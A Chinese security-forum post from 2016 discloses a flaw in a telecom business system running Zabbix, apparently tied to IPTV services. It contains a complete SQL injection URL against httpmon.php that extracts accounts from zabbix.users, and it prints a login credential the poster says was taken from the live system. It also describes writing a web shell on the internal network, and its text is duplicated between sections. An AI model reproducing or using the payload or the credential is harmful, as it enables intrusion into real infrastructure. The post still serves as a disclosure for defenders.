HanDs
管理员

[7月漏洞公开] 电信某业务系统漏洞可影响全国近千台关联业务主机(可内网+getshell) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

要是某一天我的IPTV不能用了可能就是此业务服务器宕机了~~怎么能让我不能看电视呢。

详细说明:

**.**.**.**/

ipdizhi.jpg

IP地址查询得到是北京市互联网中心

发现zabbix登录界面,想着存在弱口令发现默认口令修改了,找找看有没其他姿势。一看版本信息属于问题版本存在注入。那就上注入呗。

**.**.**.**/httpmon.php?applications=2%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(alias,0x7e,passwd,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)



得到账号信息:ctssh/aegwynqjt

登录进去一看,OMG这么多,全国范围内的都在里面啊,要是一个不小心把这个带走了,那不就都看不了电视了?罪过罪过。

主机.jpg



主机1.jpg

主机2.jpg

主机3.jpg

主机4.jpg

主机5.jpg



可内网写入脚本

写shell.jpg



点到即止只是证明能写入shell,已把shell删除,不希望被查水表。希望能上首页啊,别走小厂商了!!

漏洞证明:

**.**.**.**/

ipdizhi.jpg

IP地址查询得到是北京市互联网中心

发现zabbix登录界面,想着存在弱口令发现默认口令修改了,找找看有没其他姿势。一看版本信息属于问题版本存在注入。那就上注入呗。

**.**.**.**/httpmon.php?applications=2%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(alias,0x7e,passwd,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)



得到账号信息:ctssh/aegwynqjt

登录进去一看,OMG这么多,全国范围内的都在里面啊,要是一个不小心把这个带走了,那不就都看不了电视了?罪过罪过。

主机.jpg



主机1.jpg

主机2.jpg

主机3.jpg

主机4.jpg

主机5.jpg



可内网写入脚本

写shell.jpg



点到即止只是证明能写入shell,已把shell删除,不希望被查水表。希望能上首页啊,别走小厂商了!!

修复方案:

升级补丁

密码复杂性还是不够


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
电信 业务 系统 漏洞 影响 全国 关联 业务 主机
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复